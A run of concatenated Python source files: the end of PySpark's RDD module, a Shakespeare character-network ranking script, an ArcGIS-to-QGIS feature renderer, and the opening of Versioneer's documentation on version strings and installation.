list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())] [(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])] """ return self.map(lambda x: (f(x), x)) def repartition(self, numPartitions): """ Return a new RDD that has exactly numPartitions partitions. Can increase or decrease the level of parallelism in this RDD. Internally, this uses a shuffle to redistribute data. If you are decreasing the number of partitions in this RDD, consider using `coalesce`, which can avoid performing a shuffle. >>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4) >>> sorted(rdd.glom().collect()) [[1], [2, 3], [4, 5], [6, 7]] >>> len(rdd.repartition(2).glom().collect()) 2 >>> len(rdd.repartition(10).glom().collect()) 10 """ return self.coalesce(numPartitions, shuffle=True) def coalesce(self, numPartitions, shuffle=False): """ Return a new RDD that is reduced into `numPartitions` partitions. >>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect() [[1], [2, 3], [4, 5]] >>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect() [[1, 2, 3, 4, 5]] """ if shuffle: # Decrease the batch size in order to distribute evenly the elements across output # partitions. Otherwise, repartition will possibly produce highly skewed partitions. batchSize = min(10, self.ctx._batchSize or 1024) ser = BatchedSerializer(PickleSerializer(), batchSize) selfCopy = self._reserialize(ser) jrdd_deserializer = selfCopy._jrdd_deserializer jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle) else: jrdd_deserializer = self._jrdd_deserializer jrdd = self._jrdd.coalesce(numPartitions, shuffle) return RDD(jrdd, self.ctx, jrdd_deserializer) def zip(self, other): """ Zips this RDD with another one, returning key-value pairs with the first element in each RDD second element in each RDD, etc. Assumes that the two RDDs have the same number of partitions and the same number of elements in each partition (e.g. one was made through a map on the other). >>> x = sc.parallelize(range(0,5)) >>> y = sc.parallelize(range(1000, 1005)) >>> x.zip(y).collect() [(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)] """ def get_batch_size(ser): if isinstance(ser, BatchedSerializer): return ser.batchSize return 1 # not batched def batch_as(rdd, batchSize): return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize)) my_batch = get_batch_size(self._jrdd_deserializer) other_batch = get_batch_size(other._jrdd_deserializer) if my_batch != other_batch or not my_batch: # use the smallest batchSize for both of them batchSize = min(my_batch, other_batch) if batchSize <= 0: # auto batched or unlimited batchSize = 100 other = batch_as(other, batchSize) self = batch_as(self, batchSize) if self.getNumPartitions() != other.getNumPartitions(): raise ValueError("Can only zip with RDD which has the same number of partitions") # There will be an Exception in JVM if there are different number # of items in each partitions. pairRDD = self._jrdd.zip(other._jrdd) deserializer = PairDeserializer(self._jrdd_deserializer, other._jrdd_deserializer) return RDD(pairRDD, self.ctx, deserializer) def zipWithIndex(self): """ Zips this RDD with its element indices. The ordering is first based on the partition index and then the ordering of items within each partition. So the first item in the first partition gets index 0, and the last item in the last partition receives the largest index. This method needs to trigger a spark job when this RDD contains more than one partitions. >>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect() [('a', 0), ('b', 1), ('c', 2), ('d', 3)] """ starts = [0] if self.getNumPartitions() > 1: nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect() for i in range(len(nums) - 1): starts.append(starts[-1] + nums[i]) def func(k, it): for i, v in enumerate(it, starts[k]): yield v, i return self.mapPartitionsWithIndex(func) def zipWithUniqueId(self): """ Zips this RDD with generated unique Long ids. Items in the kth partition will get ids k, n+k, 2*n+k, ..., where n is the number of partitions. So there may exist gaps, but this method won't trigger a spark job, which is different from L{zipWithIndex} >>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect() [('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)] """ n = self.getNumPartitions() def func(k, it): for i, v in enumerate(it): yield v, i * n + k return self.mapPartitionsWithIndex(func) def name(self): """ Return the name of this RDD. """ n = self._jrdd.name() if n: return n @ignore_unicode_prefix def setName(self, name): """ Assign a name to this RDD. >>> rdd1 = sc.parallelize([1, 2]) >>> rdd1.setName('RDD1').name() u'RDD1' """ self._jrdd.setName(name) return self def toDebugString(self): """ A description of this RDD and its recursive dependencies for debugging. """ debug_string = self._jrdd.toDebugString() if debug_string: return debug_string.encode('utf-8') def getStorageLevel(self): """ Get the RDD's current storage level. >>> rdd1 = sc.parallelize([1,2]) >>> rdd1.getStorageLevel() StorageLevel(False, False, False, False, 1) >>> print(rdd1.getStorageLevel()) Serialized 1x Replicated """ java_storage_level = self._jrdd.getStorageLevel() storage_level = StorageLevel(java_storage_level.useDisk(), java_storage_level.useMemory(), java_storage_level.useOffHeap(), java_storage_level.deserialized(), java_storage_level.replication()) return storage_level def _defaultReducePartitions(self): """ Returns the default number of partitions to use during reduce tasks (e.g., groupBy). If spark.default.parallelism is set, then we'll use the value from SparkContext defaultParallelism, otherwise we'll use the number of partitions in this RDD. This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will be inherent. """ if self.ctx._conf.contains("spark.default.parallelism"): return self.ctx.defaultParallelism else: return self.getNumPartitions() def lookup(self, key): """ Return the list of values in the RDD for key `key`. This operation is done efficiently if the RDD has a known partitioner by only searching the partition that the key maps to. >>> l = range(1000) >>> rdd = sc.parallelize(zip(l, l), 10) >>> rdd.lookup(42) # slow [42] >>> sorted = rdd.sortByKey() >>> sorted.lookup(42) # fast [42] >>> sorted.lookup(1024) [] >>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey() >>> list(rdd2.lookup(('a', 'b'))[0]) ['c'] """ values = self.filter(lambda kv: kv[0] == key).values() if self.partitioner is not None: return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)]) return values.collect() def _to_java_object_rdd(self): """ Return a JavaRDD of Object by unpickling It will convert each Python object into Java object by Pyrolite, whenever the RDD is serialized in batch or not. """ rdd = self._pickled() return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True) def countApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate version of count() that returns a potentially incomplete result within a timeout, even if not all tasks have finished. >>> rdd = sc.parallelize(range(1000), 10) >>> rdd.countApprox(1000, 1.0) 1000 """ drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))]) return int(drdd.sumApprox(timeout, confidence)) def sumApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate operation to return the sum within a timeout or meet the confidence. >>> rdd = sc.parallelize(range(1000), 10) >>> r = sum(range(1000)) >>> abs(rdd.sumApprox(1000) - r) / r < 0.05 True """ jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd() jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd()) r = jdrdd.sumApprox(timeout, confidence).getFinalValue() return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high()) def meanApprox(self, timeout, confidence=0.95): """ .. note:: Experimental Approximate operation to return the mean within a timeout or meet the confidence. >>> rdd = sc.parallelize(range(1000), 10) >>> r = sum(range(1000)) / 1000.0 >>> abs(rdd.meanApprox(1000) - r) / r < 0.05 True """ jrdd = self.map(float)._to_java_object_rdd() jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd()) r = jdrdd.meanApprox(timeout, confidence).getFinalValue() return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high()) def countApproxDistinct(self, relativeSD=0.05): """ .. note:: Experimental Return approximate number of distinct elements in the RDD. The algorithm used is based on streamlib's implementation of `"HyperLogLog in Practice: Algorithmic Engineering of a State of The Art Cardinality Estimation Algorithm", available here <http://dx.doi.org/10.1145/2452376.2452456>`_. :param relativeSD: Relative accuracy. Smaller values create counters that require more space. It must be greater than 0.000017. >>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct() >>> 900 < n < 1100 True >>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct() >>> 16 < n < 24 True """ if relativeSD < 0.000017: raise ValueError("relativeSD should be greater than 0.000017") # the hash space in Java is 2^32 hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF) return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD) def toLocalIterator(self): """ Return an iterator that contains all of the elements in this RDD. The iterator will consume as much memory as the largest partition in this RDD. >>> rdd = sc.parallelize(range(10)) >>> [x for x in rdd.toLocalIterator()] [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ with SCCallSiteSync(self.context) as css: port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd()) return _load_from_socket(port, self._jrdd_deserializer) def _prepare_for_python_RDD(sc, command): # the serialized command will be compressed by broadcast ser = CloudPickleSerializer() pickled_command = ser.dumps(command) if len(pickled_command) > (1 << 20): # 1M # The broadcast will have same life cycle as created PythonRDD broadcast = sc.broadcast(pickled_command) pickled_command = ser.dumps(broadcast) broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars] sc._pickled_broadcast_vars.clear() return pickled_command, broadcast_vars, sc.environment, sc._python_includes def _wrap_function(sc, func, deserializer, serializer, profiler=None): assert deserializer, "deserializer should not be empty" assert serializer, "serializer should not be empty" command = (func, profiler, deserializer, serializer) pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command) return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec, sc.pythonVer, broadcast_vars, sc._javaAccumulator) class PipelinedRDD(RDD): """ Pipelined maps: >>> rdd = sc.parallelize([1, 2, 3, 4]) >>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect() [4, 8, 12, 16] >>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect() [4, 8, 12, 16] Pipelined reduces: >>> from operator import add >>> rdd.map(lambda x: 2 * x).reduce(add) 20 >>> rdd.flatMap(lambda x: [x, x]).reduce(add) 20 """ def __init__(self, prev, func, preservesPartitioning=False): if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable(): # This transformation is the first in its stage: self.func = func self.preservesPartitioning = preservesPartitioning self._prev_jrdd = prev._jrdd self._prev_jrdd_deserializer = prev._jrdd_deserializer else: prev_func = prev.func def pipeline_func(split, iterator): return func(split, prev_func(split, iterator)) self.func = pipeline_func self.preservesPartitioning = \ prev.preservesPartitioning and preservesPartitioning self._prev_jrdd = prev._prev_jrdd # maintain the pipeline self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer self.is_cached = False self.is_checkpointed = False self.ctx = prev.ctx self.prev = prev self._jrdd_val = None self._id = None self._jrdd_deserializer = self.ctx.serializer self._bypass_serializer = False self.partitioner = prev.partitioner if self.preservesPartitioning else None def getNumPartitions(self): return self._prev_jrdd.partitions().size() @property def _jrdd(self): if self._jrdd_val: return self._jrdd_val if self._bypass_serializer: self._jrdd_deserializer = NoOpSerializer() if self.ctx.profiler_collector: profiler = self.ctx.profiler_collector.new_profiler(self.ctx) else: profiler = None wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer, self._jrdd_deserializer, profiler) python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func, self.preservesPartitioning) self._jrdd_val = python_rdd.asJavaRDD() if profiler: self._id = self._jrdd_val.id() self.ctx.profiler_collector.add_profiler(self._id, profiler) return self._jrdd_val def id(self): if self._id is None: self._id = self._jrdd.id() return self._id def _is_pipelinable(self): return not (self.is_cached or self.is_checkpointed) def _test(): import doctest from pyspark.context import SparkContext globs = globals().copy() # The small batch size here ensures that we see multiple batches, # even in these small test examples: globs['sc'] = SparkContext('local[4]', 'PythonTest') (failure_count, test_count) = doctest.testmod( globs=globs, optionflags=doctest.ELLIPSIS) globs['sc'].stop() if failure_count: exit(-1) if __name__ == "__main__": _test()
py
7dfa1b75d22b9a12a81582318e36bfdcc66ee2ae
#!/usr/bin/env python # coding: utf-8 import re import pandas as pd from bs4 import BeautifulSoup import networkx as nx import matplotlib.pyplot as plt # Define functions def list_xmlfiles(directory): """ Return a list of filenames ending in '.txt' in DIRECTORY. Not strictly necessary but will be useful if we try to scale. """ xmlfiles = [] for filename in listdir(directory): if filename.endswith(".xml"): xmlfiles.append(filename) return xmlfiles def list_textfiles(directory): """ Return a list of filenames ending in '.txt' in DIRECTORY. Not strictly necessary but will be useful if we try to scale. """ textfiles = [] for filename in listdir(directory): if filename.endswith(".txt"): textfiles.append(filename) return textfiles def count_totals(character_list): """ Function to count the total number of speech acts and lines per character in each play """ counts = [] for character in character_list: lines = [[line.text for line in test(['l','p'])] for test in soup.findAll(who=character)] words = [[word.replace('\n', ' ').replace('\r', '') for word in words] for words in lines] x = [] for item in words: for s in item: x.append(len(re.findall(r'\w+', s))) speech_acts = len(lines) total_words = sum(x) totals = (character, speech_acts, total_words) counts.append(totals) df = pd.DataFrame(counts, columns=["character", "lines", "words"]) return df def folger_count(character_list): """ Hacky function to deal with Folger Shakespeare editions """ counts = [] for character in character_list: lines = [test('lb') for test in soup.findAll(who=character)] words = [test('w') for test in soup.findAll(who=character)] speech_acts = sum([sum(v != 0 for v in i) for i in lines]) total_words = sum([sum(v != 0 for v in i) for i in words]) totals = (character, speech_acts, total_words) counts.append(totals) df = pd.DataFrame(counts, columns=["character", "lines", "words"]) return df def total_rankings(df): """ Create count rankings based on word and line lengths. """ df["line_rank"] = df["lines"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int) df["word_rank"] = df["words"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int) df["count_rank"] = ((df["line_rank"] + df["word_rank"])/2).astype(int) return df def metric_rankings(df): """ Create metrics rankings based on node metrics from .Gephi file I don't like this function very much. It's too pandas-y. But it works. """ df["WD_rank"] = df["weighted_degree"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int) df["EC_rank"] = df["eigenvector"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int) df["degree_rank"] = df["degree"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int) df["BC_rank"] = df["betweenness"].sort_values(ascending=False).rank(method='dense', ascending=False).astype(int) df["metrics_rank"] = ((df["WD_rank"] + df["EC_rank"] + df["degree_rank"] + df["BC_rank"])/4).astype(int) return df # list of filenames indir = os.path.join("data", "text") def main(): # Read in plays and create BeautifulSoup object for target in indir: print(f"Reading {target}...") filename = os.path.join(indir, "{target}.xml") with open(filename, 'r') as file: raw = file.read() soup = BeautifulSoup(raw, 'lxml') # create list of characters based on lines idList = [] for a in soup.findAll('sp'): if 'who' in a.attrs.keys(): idList.append(a.attrs['who']) # Only unique characters unique = set(idList) # Calculate lines and words for all characters if target in ("1H4","2H4"): out = folger_count(unique) totals = out else: totals = count_totals(unique) # Cleanup tables and rank measures cleaned = pd.read_csv(f"../data/character_lists/{target}.csv", header=None) merged = pd.merge(totals, cleaned, left_on="character", right_on=0) merged = merged[[1, "lines", "words"]] merged = merged.dropna() merged = merged[~merged[1].str.contains('#')] merged = merged.groupby(1)[['lines', 'words']].sum().reset_index() merged.columns.values[0] = 'character' # Calculate + save count ranks count_ranks = total_rankings(merged) # Calculate metric measures using networkx edgelist_df = pd.read_csv(f"../data/edgelists/{target}.csv") G = nx.from_pandas_edgelist(edgelist_df, "Source", "Target", ["Weight"]) nx.write_gexf(G, f"../data/graphs/{target}.gexf") plt.figure(figsize=(14,14)) #nx.draw(G, with_labels=True, font_size=20) #plt.draw() # betweenness centrality bcentrality = nx.betweenness_centrality(G, normalized=False) between = sorted(((float(c), v) for v,c in bcentrality.items()), reverse=True) # eigenvector centrality ecentrality = nx.eigenvector_centrality_numpy(G) eigen = sorted(((float(c), v) for v,c in ecentrality.items()), reverse=True) # degree and weighted degree degree = list(map(list, [(k,v) for k, v in nx.degree(G)])) weighted_degree = list(map(list, [(k,v) for k, v in nx.degree(G, weight="Weight")])) # merge centrality measures centrality = pd.merge(pd.DataFrame(between), pd.DataFrame(eigen), on=1) centrality.columns = ["betweenness", "character", "eigenvector"] # merge degree measures degrees = pd.merge(pd.DataFrame(degree), pd.DataFrame(weighted_degree), on=0) degrees.columns = ["character", "degree", "weighted_degree"] # merge all metrics = pd.merge(centrality, degrees, on="character") metrics = metrics[['character', 'betweenness', 'eigenvector', 'degree', 'weighted_degree']] # Calculate + save ranked metric measures metric_ranks = metric_rankings(metrics) # Check for consistency len(metric_ranks) == len(count_ranks) # Combine tables print(f"Saving data for {target}...") count_ranks["character"] = [c.strip() for c in count_ranks["character"]] metric_ranks["character"] = [c.strip() for c in metric_ranks["character"]] # Save abridged ranks ranks = pd.merge(count_ranks, metric_ranks, left_on="character", right_on="character") ranks = ranks[["character", "line_rank", "word_rank", "WD_rank", "BC_rank"]] ranks.to_csv(f"{target}_abridged_ranks.csv", header=True, sep="\t") # Create a larger table that brings together all of our desired metrics into a single table. all_ranks = pd.merge(count_ranks, metric_ranks, left_on="character", right_on="character") all_ranks = all_ranks[["character", "lines", "words", "degree", "weighted_degree", "eigenvector", "betweenness", "line_rank", "word_rank", "degree_rank", "WD_rank","BC_rank", "EC_rank", "count_rank", "metrics_rank"]] all_ranks.to_csv(f"../data/tables/full/{target}_full_ranks.csv") # Calculate + save spearman's rho corr = ranks.corr(method='spearman').round(2) corr.to_csv(f"{target}.csv",header=True, sep="\t") if __name__=="__main__": main()
py
7dfa1bbf5d6f3073a5639f2e4675541d1cb0f356
import arcpy from comtypes import COMError from modules.functions import change_interface from modules.arcGisModules import ArcGisModules from renderer.feature.graduatedColorsRenderer import GraduatedColorsRenderer from renderer.feature.symbols.symbolPropertiesProvider import SymbolPropertiesProvider from renderer.feature.uniqueValueRenderer import UniqueValueRenderer from renderer.feature.symbols.simpleSymbol import SimpleSymbol class FeatureRenderer: def __init__(self): pass @staticmethod def create_feature_renderer(base): """This creates the feature-renderer-element in the DOM :param base: is the self of the renderer object containing: base.xml_document = xml_document base.map_layer_element = map_layer_element base.arcLayer = arc_layer base.layer = layer base.rendererType = renderer_type """ renderer = base.xml_document.createElement("renderer-v2") renderer.setAttribute("forceraster", "0") renderer.setAttribute("enableorderby", "0") renderer.setAttribute("symbollevels", "0") base.map_layer_element.appendChild(renderer) symbols_element = base.xml_document.createElement("symbols") renderer.appendChild(symbols_element) symbols = [] arc_feature_layer = change_interface(base.arcLayer, ArcGisModules.module_carto.IFeatureLayer) arc_geo_feature_layer = change_interface(arc_feature_layer, ArcGisModules.module_carto.IGeoFeatureLayer) simple_renderer = arc_geo_feature_layer.Renderer unique_value_renderer = change_interface(simple_renderer, ArcGisModules.module_carto.IUniqueValueRenderer) # get a feature, mostly 0 , but can be higher, if using objects from a db -> than takes the id feature = None try: for i in range(0, 1000): try: feature = arc_feature_layer.FeatureClass.GetFeature(i) break except COMError: i += 1 except AttributeError: arcpy.AddWarning("\t\tFinding a Feature to render failed.") print "Something went wrong. Are you using a DB where the IDs start at 1001?" pass if base.layer.symbologyType == "OTHER" and not unique_value_renderer: renderer.setAttribute("type", "singleSymbol") symbols.append(simple_renderer.SymbolByFeature(feature)) elif base.layer.symbologyType == "UNIQUE_VALUES" or unique_value_renderer: UniqueValueRenderer.create_unique_values_element(base, renderer, symbols) elif base.layer.symbologyType == "GRADUATED_COLORS" or "GRADUATED_SYMBOLS": GraduatedColorsRenderer.create_graduated_colors_element(base, renderer, symbols) try: arc_feature_layer = change_interface(base.arcLayer, ArcGisModules.module_carto.IFeatureLayer) layer_effects = change_interface(arc_feature_layer, ArcGisModules.module_carto.ILayerEffects) alpha = str(1 - layer_effects.Transparency * 0.01) except AttributeError: alpha = "1" # create the symbol element, one for single symbol, more for graduated or unique values for count, iSymbol in enumerate(symbols): symbol_properties = {} if arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 4: SymbolPropertiesProvider.get_polygon_properties(symbol_properties, iSymbol) elif arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 3: SymbolPropertiesProvider.get_line_properties(symbol_properties, iSymbol) elif (arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 2) | \ (arc_geo_feature_layer.DisplayFeatureClass.ShapeType == 1): SymbolPropertiesProvider.get_point_properties(symbol_properties, iSymbol) SimpleSymbol.create_simple_symbol(base.xml_document, symbols_element, symbol_properties, count, alpha)
py
7dfa1c4c3811467bfc7981bb8cd30ef96928b227
# Version: 0.15+dev """The Versioneer - like a rocketeer, but for versions. The Versioneer ============== * like a rocketeer, but for versions! * https://github.com/warner/python-versioneer * Brian Warner * License: Public Domain * Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy * [![Latest Version] (https://pypip.in/version/versioneer/badge.svg?style=flat) ](https://pypi.python.org/pypi/versioneer/) * [![Build Status] (https://travis-ci.org/warner/python-versioneer.png?branch=master) ](https://travis-ci.org/warner/python-versioneer) This is a tool for managing a recorded version number in distutils-based python projects. The goal is to remove the tedious and error-prone "update the embedded version string" step from your release process. Making a new release should be as easy as recording a new tag in your version-control system, and maybe making new tarballs. ## Quick Install * `pip install versioneer` to somewhere to your $PATH * add a `[versioneer]` section to your setup.cfg (see below) * run `versioneer install` in your source tree, commit the results ## Version Identifiers Source trees come from a variety of places: * a version-control system checkout (mostly used by developers) * a nightly tarball, produced by build automation * a snapshot tarball, produced by a web-based VCS browser, like github's "tarball from tag" feature * a release tarball, produced by "setup.py sdist", distributed through PyPI Within each source tree, the version identifier (either a string or a number, this tool is format-agnostic) can come from a variety of places: * ask the VCS tool itself, e.g. "git describe" (for checkouts), which knows about recent "tags" and an absolute revision-id * the name of the directory into which the tarball was unpacked * an expanded VCS keyword ($Id$, etc) * a `_version.py` created by some earlier build step For released software, the version identifier is closely related to a VCS tag. Some projects use tag names that include more than just the version string (e.g. "myproject-1.2" instead of just "1.2"), in which case the tool needs to strip the tag prefix to extract the version identifier. For unreleased software (between tags), the version identifier should provide enough information to help developers recreate the same tree, while also giving them an idea of roughly how old the tree is (after version 1.2, before version 1.3). Many VCS systems can report a description that captures this, for example `git describe --tags --dirty --always` reports things like "0.7-1-g574ab98-dirty" to indicate that the checkout is one revision past the 0.7 tag, has a unique revision id of "574ab98", and is "dirty" (it has uncommitted changes. The version identifier is used for multiple purposes: * to allow the module to self-identify its version: `myproject.__version__` * to choose a name and prefix for a 'setup.py sdist' tarball ## Theory of Operation Versioneer works by adding a special `_version.py` file into your source tree, where your `__init__.py` can import it. This `_version.py` knows how to dynamically ask the VCS tool for version information at import time. `_version.py` also contains `$Revision$` markers, and the installation process marks `_version.py` to have this marker rewritten with a tag name during the `git archive` command. As a result, generated tarballs will contain enough information to get the proper version. To allow `setup.py` to compute a version too, a `versioneer.py` is added to the top level of your source tree, next to `setup.py` and the `setup.cfg` that configures it. This overrides several distutils/setuptools commands to compute the version when invoked, and changes `setup.py build` and `setup.py sdist` to replace `_version.py` with a small static file that contains just the generated version data. ## Installation First, decide on values for the following configuration variables: * `VCS`: the version control system you use. Currently accepts "git". * `style`: the style of version string to be produced. See "Styles" below for details. Defaults to "pep440", which looks like `TAG[+DISTANCE.gSHORTHASH[.dirty]]`. * `versionfile_source`: A project-relative pathname into which the generated version strings should be written. This is usually a `_version.py` next to your project's main `__init__.py` file, so it can be imported at runtime. If your project uses `src/myproject/__init__.py`, this should be `src/myproject/_version.py`. This file should be checked in to your VCS as usual: the copy created below by `setup.py setup_versioneer` will include code that parses expanded VCS keywords in generated tarballs. The 'build' and 'sdist' commands will replace it with a copy that has just the calculated version string. This must be set even if your project does not have any modules (and will therefore never import `_version.py`), since "setup.py sdist" -based trees still need somewhere to record the pre-calculated version strings. Anywhere in the source tree should do. If there is a `__init__.py` next to your `_version.py`, the `setup.py setup_versioneer` command (described below) will append some `__version__`-setting assignments, if they aren't already present. * `versionfile_build`: Like `versionfile_source`, but relative to the build directory instead of the source directory. These will differ when your setup.py uses 'package_dir='. If you have `package_dir={'myproject': 'src/myproject'}`, then you will probably have `versionfile_build='myproject/_version.py'` and `versionfile_source='src/myproject/_version.py'`. If this is set to None, then `setup.py build` will not attempt to rewrite any `_version.py` in the built tree. If your project does not have any libraries (e.g. if it only builds a script), then you should use `versionfile_build = None`. To actually use the computed version string, your `setup.py` will need to override `distutils.command.build_scripts` with a subclass that explicitly inserts a copy of `versioneer.get_version()` into your script file. See `test/demoapp-script-only/setup.py` for an example. * `tag_prefix`: a string, like 'PROJECTNAME-', which appears at the start of all VCS tags. If your tags look like 'myproject-1.2.0', then you should use tag_prefix='myproject-'. If you use unprefixed tags like '1.2.0', this should be an empty string, using either `tag_prefix=` or `tag_prefix=''`. * `parentdir_prefix`: a optional string, frequently the same as tag_prefix, which appears at the start of all unpacked tarball filenames. If your tarball unpacks into 'myproject-1.2.0', this should be 'myproject-'. To disable this feature, just omit the field from your `setup.cfg`. This tool provides one script, named `versioneer`. That script has one mode, "install", which writes a copy of `versioneer.py` into the current directory and runs `versioneer.py setup` to finish the installation. To versioneer-enable your project: * 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and populating it with the configuration values you decided earlier (note that the option names are not case-sensitive): ```` [versioneer] VCS = git style = pep440 versionfile_source = src/myproject/_version.py versionfile_build = myproject/_version.py tag_prefix = parentdir_prefix = myproject- ```` * 2: Run `versioneer install`. This will do the following: * copy `versioneer.py` into the top of your source tree * create `_version.py` in the right place (`versionfile_source`) * modify your `__init__.py` (if one exists next to `_version.py`) to define `__version__` (by calling a function from `_version.py`) * modify your `MANIFEST.in` to include both `versioneer.py` and the generated `_version.py` in sdist tarballs `versioneer install` will complain about any problems it finds with your `setup.py` or `setup.cfg`. Run it multiple times until you have fixed all the problems. * 3: add a `import versioneer` to your setup.py, and add the following arguments to the setup() call: version=versioneer.get_version(), cmdclass=versioneer.get_cmdclass(), * 4: commit these changes to your VCS. To make sure you won't forget, `versioneer install` will mark everything it touched for addition using `git add`. Don't forget to add `setup.py` and `setup.cfg` too. ## Post-Installation Usage Once established, all uses of your tree from a VCS checkout should get the current version string. All generated tarballs should include an embedded version string (so users who unpack them will not need a VCS tool installed). If you distribute your project through PyPI, then the release process should boil down to two steps: * 1: git tag 1.0 * 2: python setup.py register sdist upload If you distribute it through github (i.e. users use github to generate tarballs with `git archive`), the process is: * 1: git tag 1.0 * 2: git push; git push --tags Versioneer will report "0+untagged.NUMCOMMITS.gHASH" until your tree has at least one tag in its history. ## Version-String Flavors Code which uses Versioneer can learn about its version string at runtime by importing `_version` from your main `__init__.py` file and running the `get_versions()` function. From the "outside" (e.g. in `setup.py`), you can import the top-level `versioneer.py` and run `get_versions()`. Both functions return a dictionary with different flavors of version information: * `['version']`: A condensed version string, rendered using the selected style. This is the most commonly used value for the project's version string. The default "pep440" style yields strings like `0.11`, `0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the "Styles" section below for alternative styles. * `['full-revisionid']`: detailed revision identifier. For Git, this is the full SHA1 commit id, e.g. "1076c978a8d3cfc70f408fe5974aa6c092c949ac". * `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that this is only accurate if run in a VCS checkout, otherwise it is likely to be False or None * `['error']`: if the version string could not be computed, this will be set to a string describing the problem, otherwise it will be None. It may be useful to throw an exception in setup.py if this is set, to avoid e.g. creating tarballs with a version string of "unknown". Some variants are more useful than others. Including `full-revisionid` in a bug report should allow developers to reconstruct the exact code being tested (or indicate the presence of local changes that should be shared with the developers). `version` is suitable for display in an "about" box or a CLI `--version` output: it can be easily compared against release notes and lists of bugs fixed in various releases. The installer adds the following text to your `__init__.py` to place a basic version in `YOURPROJECT.__version__`: from ._version import get_versions __version__ = get_versions()['version'] del get_versions ## Styles The setup.cfg `style=` configuration controls how the VCS information is rendered into a version string. The default style, "pep440", produces a PEP440-compliant string, equal to the un-prefixed tag name for actual releases, and containing an additional "local version" section with more detail for in-between builds. For Git, this is TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags --dirty --always`. For example "0.11+2.g1076c97.dirty" indicates that the tree is like the "1076c97" commit but has uncommitted changes (".dirty"), and that this commit is two revisions ("+2") beyond the "0.11" tag. For released software (exactly equal to a known tag), the identifier will only contain the stripped tag, e.g. "0.11". Other styles are available. See details.md in the Versioneer source tree for descriptions. ## Debugging Versioneer tries to avoid fatal errors: if something goes wrong, it will tend to return a version of "0+unknown". To investigate the problem, run `setup.py version`, which will run the version-lookup code in a verbose mode, and will display the full contents of `get_versions()` (including the `error` string, which may help identify what went wrong). ## Updating Versioneer To upgrade your project to a new release of Versioneer, do the following: * install the new Versioneer (`pip install -U versioneer` or equivalent) * edit `setup.cfg`, if necessary, to include any new configuration settings indicated by the release notes * re-run `versioneer install` in your source tree, to replace `SRC/_version.py` * commit any changed files ### Upgrading to 0.15 Starting with this version, Versioneer is configured with a `[versioneer]` section in your `setup.cfg` file. Earlier versions required the `setup.py` to set attributes on the `versioneer` module immediately after import. The new version will refuse to run (raising an exception during import) until you have provided the necessary `setup.cfg` section. In addition, the Versioneer package provides an executable named `versioneer`, and the installation process is driven by running `versioneer install`. In 0.14 and earlier, the executable was named `versioneer-installer` and was run without an argument. ### Upgrading to 0.14 0.14 changes the format of the version string. 0.13 and earlier used hyphen-separated strings like "0.11-2-g1076c97-dirty". 0.14 and beyond use a plus-separated "local version" section strings, with dot-separated components, like "0.11+2.g1076c97". PEP440-strict tools did not like the old format, but should be ok with the new one. ### Upgrading from 0.11 to 0.12 Nothing special. ### Upgrading from 0.10 to 0.11 You must add a `versioneer.VCS = "git"` to your `setup.py` before re-running `setup.py setup_versioneer`. This will enable the use of additional version-control systems (SVN, etc) in the future. ## Future Directions This tool is designed to make it easily extended to other version-control systems: all VCS-specific components are in separate directories like src/git/ . The top-level `versioneer.py` script is assembled from these components by running make-versioneer.py . In the future, make-versioneer.py will take a VCS name as an argument, and will construct a version of `versioneer.py` that is specific to the given VCS. It might also take the configuration arguments that are currently provided manually during installation by editing setup.py . Alternatively, it might go the other direction and include code from all supported 